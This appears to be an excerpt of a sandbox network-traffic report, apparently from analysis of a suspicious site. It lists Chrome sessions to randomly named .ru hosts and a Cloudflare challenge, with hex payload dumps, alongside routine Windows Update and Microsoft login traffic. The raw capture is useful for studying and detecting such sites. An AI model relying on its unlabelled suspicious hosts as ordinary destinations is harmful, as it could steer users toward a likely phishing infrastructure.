                                                                                                        cf-chl-out-s: z6E/CbdH2dAEagZVst59XeCa6mzvm1HaCQna72W3W1Jx/AKSfO774pzeN+he1Igexiyt+LDdZw4BycMxuCZKBnLkHIsqxtc79puc7AwhGNzh2/i9dI/XnVsTPHQKp+nPYsgBztRbyIA4g++L+TntQiZHrYVATJm0cCr8yCKVHmB3UtlE9fp98q042FTpJQZzsKtcjHbjRihIailHCRlWqb0uDbjzc9N5Ym+TPWThsvxurK0ee7kNBhE5VpfXTKmH9Zhk8YavA0CdKG0pMVtmrl3ry3IjxkOXIbIyK5D1hit+p87kM7Dd3FCsRa+S5niC1zbI28IJ1EKeLWEpfVOne7c0FOfKLb5f+kW22IblruZbsJZUaNjFoLSDz7K20R9uEZtcrCLcEMovuIuNwpjcey7ZSNNiZnrG6VRl3f2/IQpXYRwpYgWZmv1u7IKO7MQ0hkBEfayKPbmr1JTjKFMbAg77mnWPttCmpjr/fpYVtK51YcVmyoxYw1iXLNafsUhaVk+JLJJnS390gGEhAOcaK5MoOAPW0FLsjI2F7MONdezhgfEyxTlDrV6vAWw1wg2Q3VmX6pd+sdLNVlI7xkvWAb0DYOUsgZR2oXiA+DjPghA5wuAafmILBo5KKcnaJFY9awkCfYpZHsdifGtLQR9AYXL10T1gFswAxN3BklXztwDnBXpESJvMawvCSFXtw3RI5KZQVU9y54vNtSurrtuHCEaORSOQjsNV5HXgLmruX9xYFIU5PN+7trD3aQcemHLkm+eEL7MmVWl6EmPmCTG9fHSyhkf4doFJderiKpI+yFugGZ2ag7lCwcBGzMvyRN4dsxGaEYO4hpOD9JLfCptubMzUKry1QKZChPu8pm+lISCS6CUWHXB5E2ZObhGBwAgUsKz2PYYzZJE8z/r/Ln528YQ=$mg8IWUqm2jqXRCLU
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b809e1141c6-EWR
                                                                                                        2024-10-04 13:11:48 UTC78INData Raw: 59 59 43 43 6a 6c 70 69 59 58 4f 4a 6a 58 46 35 68 34 4f 4e 61 5a 65 66 56 57 74 5a 64 6e 4a 38 58 59 39 6e 59 61 57 6f 64 4b 74 36 5a 48 2b 49 62 59 57 45 68 59 65 58 6a 72 4b 6f 72 34 79 33 72 4c 4f 51 66 71 78 39 70 48 32 6c 66 6e
                                                                                                        Data Ascii: YYCCjlpiYXOJjXF5h4ONaZefVWtZdnJ8XY9nYaWodKt6ZH+IbYWEhYeXjrKor4y3rLOQfqx9pH2lfn
                                                                                                        2024-10-04 13:11:48 UTC1369INData Raw: 32 6d 78 4d 69 55 68 59 79 36 76 4d 4b 4d 76 71 71 4c 6e 6f 69 77 71 61 75 57 73 73 69 38 6d 4d 43 64 79 37 48 43 77 74 2b 2b 73 4a 2b 70 77 4f 6e 41 71 39 7a 4e 37 4d 76 4c 72 4d 2b 76 72 38 69 78 32 63 6a 49 2f 4f 66 54 35 37 66 4a 30 66 51 41 77 4c 7a 66 35 4d 57 38 43 66 33 4b 2b 2b 62 48 36 2b 7a 6c 37 39 50 6b 37 4e 48 35 44 73 33 38 43 4f 7a 77 45 51 33 77 33 79 50 32 2f 42 45 6a 2b 66 37 6b 36 76 66 6f 47 76 6f 41 43 51 41 42 39 50 51 76 49 66 51 73 39 77 59 54 50 69 6b 4c 4c 44 56 41 4d 76 73 78 2b 66 6f 43 46 53 78 48 43 53 56 4b 43 79 6b 4a 51 56 41 6f 4d 43 52 4e 52 41 30 61 57 55 74 4a 50 46 35 62 54 44 6b 66 4c 31 67 79 4d 53 6f 37 53 6b 68 50 5a 56 73 73 52 55 31 54 59 55 38 30 64 32 4e 69 62 44 68 4b 4d 48 73 35 58 44 68 38 5a 56 78 50 67
                                                                                                        Data Ascii: 2mxMiUhYy6vMKMvqqLnoiwqauWssi8mMCdy7HCwt++sJ+pwOnAq9zN7MvLrM+vr8ix2cjI/OfT57fJ0fQAwLzf5MW8Cf3K++bH6+zl79Pk7NH5Ds38COzwEQ3w3yP2/BEj+f7k6vfoGvoACQAB9PQvIfQs9wYTPikLLDVAMvsx+foCFSxHCSVKCykJQVAoMCRNRA0aWUtJPF5bTDkfL1gyMSo7SkhPZVssRU1TYU80d2NibDhKMHs5XDh8ZVxPg
                                                                                                        2024-10-04 13:11:48 UTC1369INData Raw: 43 79 35 6d 79 73 5a 7a 52 77 4b 61 6b 77 38 69 35 71 4e 76 4e 30 70 47 79 77 70 76 57 34 64 69 68 76 63 6e 4b 75 63 48 46 33 71 6e 70 70 39 37 6e 79 4b 37 6b 78 2b 4b 7a 34 39 72 6e 79 66 43 36 7a 63 2f 78 39 76 76 63 39 37 2f 63 41 66 6f 43 34 41 62 32 41 73 2f 47 42 4d 7a 51 34 51 6b 4c 42 77 2f 76 35 39 49 61 43 64 72 6e 48 67 49 6a 34 78 6f 4f 39 69 63 67 48 41 6e 34 49 67 49 6c 42 67 6b 54 4b 67 30 74 4a 78 59 42 4a 67 30 72 38 2f 77 76 50 2f 70 43 46 78 49 53 45 69 38 58 41 52 6b 38 42 54 74 46 4f 42 30 6f 44 44 4d 4d 52 43 73 33 4f 45 51 75 4c 68 59 55 53 55 38 35 58 45 45 31 57 46 52 47 57 45 55 6f 57 46 49 37 52 57 56 66 4b 43 68 6d 59 79 78 46 61 46 56 73 5a 32 5a 6e 58 46 5a 64 55 44 74 56 51 57 4a 7a 51 30 42 77 56 6c 56 4a 59 46 68 4d 67 48
                                                                                                        Data Ascii: Cy5mysZzRwKakw8i5qNvN0pGywpvW4dihvcnKucHF3qnpp97nyK7kx+Kz49rnyfC6zc/x9vvc97/cAfoC4Ab2As/GBMzQ4QkLBw/v59IaCdrnHgIj4xoO9icgHAn4IgIlBgkTKg0tJxYBJg0r8/wvP/pCFxISEi8XARk8BTtFOB0oDDMMRCs3OEQuLhYUSU85XEE1WFRGWEUoWFI7RWVfKChmYyxFaFVsZ2ZnXFZdUDtVQWJzQ0BwVlVJYFhMgH
                                                                                                        2024-10-04 13:11:48 UTC1369INData Raw: 71 70 48 4f 6b 38 71 70 6b 74 33 50 31 64 4f 36 30 71 79 67 77 74 50 42 75 63 62 63 75 39 2f 4d 77 4b 66 61 33 4e 37 6e 79 63 58 64 78 2b 48 30 36 4c 54 51 73 2b 2f 4d 30 41 44 30 42 50 50 59 32 50 6d 35 30 75 6e 46 36 41 54 33 41 2b 6e 71 42 4d 7a 46 38 2f 54 30 44 4f 67 44 31 52 73 4b 37 39 6e 78 2b 51 6f 42 39 51 55 51 33 2f 67 62 43 2b 54 6f 43 42 37 70 42 67 63 54 45 65 73 74 4a 2b 38 4b 43 53 34 56 2b 42 63 78 4e 66 63 79 49 79 49 42 44 69 38 6c 4b 54 73 30 47 69 78 49 50 68 31 48 55 6a 38 30 4c 52 41 31 54 43 51 51 53 53 6b 75 4e 55 74 54 45 6a 6f 31 48 6b 49 79 57 45 45 6f 57 30 73 37 56 79 5a 4f 4b 7a 31 76 59 55 4a 56 4c 6c 56 56 59 6e 70 4e 57 6c 55 32 62 6e 42 73 57 6e 51 39 57 6c 78 34 56 30 46 55 65 57 78 68 66 57 4a 5a 55 49 69 43 59 35 4f
                                                                                                        Data Ascii: qpHOk8qpkt3P1dO60qygwtPBucbcu9/MwKfa3N7nycXdx+H06LTQs+/M0AD0BPPY2Pm50unF6AT3A+nqBMzF8/T0DOgD1RsK79nx+QoB9QUQ3/gbC+ToCB7pBgcTEestJ+8KCS4V+BcxNfcyIyIBDi8lKTs0GixIPh1HUj80LRA1TCQQSSkuNUtTEjo1HkIyWEEoW0s7VyZOKz1vYUJVLlVVYnpNWlU2bnBsWnQ9Wlx4V0FUeWxhfWJZUIiCY5O
                                                                                                        2024-10-04 13:11:48 UTC367INData Raw: 73 69 2b 71 4a 72 66 77 4d 43 37 34 62 6a 5a 70 75 50 4b 74 63 50 71 77 65 4b 2f 38 4e 44 69 73 76 58 4a 30 65 47 79 7a 65 76 4d 37 64 41 41 36 66 7a 68 75 72 36 37 32 51 6a 50 76 39 2f 56 2b 51 6e 68 41 2b 4d 52 38 4d 72 4f 79 2f 55 59 42 77 76 73 30 2b 77 4b 38 75 6a 61 48 41 50 74 39 39 2f 35 42 4f 63 5a 41 50 66 72 48 77 30 76 35 6a 45 7a 36 76 4c 75 44 43 45 59 4e 53 67 53 43 53 67 6d 44 55 41 51 49 78 63 32 41 44 6a 38 46 45 49 30 50 77 73 37 48 53 34 63 50 6a 77 79 4a 51 77 6d 49 53 78 47 4b 6a 55 74 46 46 30 32 55 46 56 64 46 55 78 43 4e 6a 74 61 57 6c 77 64 50 43 6c 45 5a 6d 78 6d 54 57 6f 75 61 7a 4a 73 62 45 4a 4c 51 30 35 39 4e 48 68 65 62 47 31 58 65 56 65 47 64 58 68 64 56 6d 4f 4c 56 57 68 46 66 55 39 6c 6c 4a 4e 77 61 59 56 74 6c 48 70 33
                                                                                                        Data Ascii: si+qJrfwMC74bjZpuPKtcPqweK/8NDisvXJ0eGyzevM7dAA6fzhur672QjPv9/V+QnhA+MR8MrOy/UYBwvs0+wK8ujaHAPt99/5BOcZAPfrHw0v5jEz6vLuDCEYNSgSCSgmDUAQIxc2ADj8FEI0Pws7HS4cPjwyJQwmISxGKjUtFF02UFVdFUxCNjtaWlwdPClEZmxmTWouazJsbEJLQ059NHhebG1XeVeGdXhdVmOLVWhFfU9llJNwaYVtlHp3


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        47192.168.2.1652656104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:49 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/868862447:1728044727:Gz7Dl8mZdZr0DP9Q4Zh7hrsdOMaLwCsED9HAlqQ_3D4/8cd56b4bca50423a/c1fc4ecc24bba50 HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:49 UTC349INHTTP/1.1 404 Not Found
                                                                                                        Date: Fri, 04 Oct 2024 13:11:49 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        cf-chl-out: Vd2veF7XUrenRDAHIpsr0CZkeVk8/0YpM1c=$JPfO3Mcg6OrxtEgd
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b864dc2c32a-EWR
                                                                                                        2024-10-04 13:11:49 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                        Data Ascii: invalid


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        48192.168.2.1652658188.114.97.34431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:49 UTC665OUTGET /rreozoythcvyficrHTcllUWRLKOTPFRJKMWZZBRXQBHXTDTWYQN HTTP/1.1
                                                                                                        Host: wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ru
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://9wetjda.niavereinho.ru
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://9wetjda.niavereinho.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:50 UTC691INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:50 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BQBgs2TpdwOSQSbcA4B3LY4dPR4mIeyxx0f3iG2nTi1zZpUuNNaecd2yChqGqEJsuU1ryCZ05AgeOcfOcK4ZtLzEyaINhTlVF96LOAAAR43YOEwmorvCajAzUNwnfZW16DV56DBpr3fZMnVAmtFXBNiqz98oTjtJGKRBymB1ryxMzRwSaW1Y5VNPHDHdXOHDjdbk8Dxq9w6DDUU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b89ce454393-EWR
                                                                                                        2024-10-04 13:11:50 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                        Data Ascii: 11
                                                                                                        2024-10-04 13:11:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        49192.168.2.1652659104.17.202.2044431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:51 UTC699OUTGET / HTTP/1.1
                                                                                                        Host: noon.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-User: ?1
                                                                                                        Sec-Fetch-Dest: document
                                                                                                        Referer: https://9wetjda.niavereinho.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:51 UTC358INHTTP/1.1 302 Moved Temporarily
                                                                                                        Date: Fri, 04 Oct 2024 13:11:51 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 143
                                                                                                        Connection: close
                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                        Location: https://www.noon.com/
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b93e8700f74-EWR
                                                                                                        2024-10-04 13:11:51 UTC143INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        50192.168.2.1652662188.114.96.34431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:52 UTC447OUTGET /rreozoythcvyficrHTcllUWRLKOTPFRJKMWZZBRXQBHXTDTWYQN HTTP/1.1
                                                                                                        Host: wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ru
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:53 UTC693INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:53 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tRNf8f6nP6Z9NRkZGaAW5lHJLvxIBlZVz4MT0fOFa9bQMvlSeHmw5VxoOH954LvfmgWuSFJOpSefYkLyhZy6BsINdS%2Fng63ZBpKko9Bz2aItLFelV2euej7SKLkmmXuDNCnVzaE9vGiiavHiYMhdgEnpK7Xcbwc9XV9uhDh4g8u906J4IfxbtcORbpmP9OEh7CoGcG6AE890%2FBU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b972dd615c7-EWR
                                                                                                        2024-10-04 13:11:53 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                        Data Ascii: 11
                                                                                                        2024-10-04 13:11:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        51192.168.2.165266420.12.23.50443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:54 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=CuYWk7mCX1vLgvr&MD=ATD2E8nm HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept: */*
                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                        Host: slscr.update.microsoft.com
                                                                                                        2024-10-04 13:11:55 UTC560INHTTP/1.1 200 OK
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Expires: -1
                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                        ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                        MS-CorrelationId: 59c6ab0c-8b87-455e-b87d-c54dccaa721a
                                                                                                        MS-RequestId: 9fcea7d3-86bd-4b0f-b1b0-401aa1eb89f6
                                                                                                        MS-CV: cinOJi+QME6pjTRq.0
                                                                                                        X-Microsoft-SLSClientCache: 1440
                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Date: Fri, 04 Oct 2024 13:11:54 GMT
                                                                                                        Connection: close
                                                                                                        Content-Length: 30005
                                                                                                        2024-10-04 13:11:55 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                        Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                        2024-10-04 13:11:55 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                        Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        52192.168.2.165266520.190.159.75443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:12:02 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/soap+xml
                                                                                                        Accept: */*
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                        Content-Length: 4828
                                                                                                        Host: login.live.com
                                                                                                        2024-10-04 13:12:02 UTC4828OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                        2024-10-04 13:12:02 UTC569INHTTP/1.1 200 OK
                                                                                                        Cache-Control: no-store, no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                        Expires: Fri, 04 Oct 2024 13:11:02 GMT
                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                        x-ms-route-info: C538_BAY
                                                                                                        x-ms-request-id: 0d48fb9b-4395-4847-9684-fff2be9ba991
                                                                                                        PPServer: PPV: 30 H: PH1PEPF00011EDF V: 0
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        Date: Fri, 04 Oct 2024 13:12:02 GMT
                                                                                                        Connection: close
                                                                                                        Content-Length: 11177
                                                                                                        2024-10-04 13:12:02 UTC11177INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        53192.168.2.16526662.23.209.161443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:12:03 UTC2697OUTGET /client/config?cc=CH&setlang=en-CH HTTP/1.1
                                                                                                        X-Search-CortanaAvailableCapabilities: None
                                                                                                        X-Search-SafeSearch: Moderate
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                        X-UserAgeClass: Unknown
                                                                                                        X-BM-Market: CH
                                                                                                        X-BM-DateFormat: dd/MM/yyyy
                                                                                                        X-Device-OSSKU: 48
                                                                                                        X-BM-DTZ: -240
                                                                                                        X-DeviceID: 01000A4109009A83
                                                                                                        X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75
                                                                                                        X-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Time
                                                                                                        X-BM-Theme: 000000;0078d7
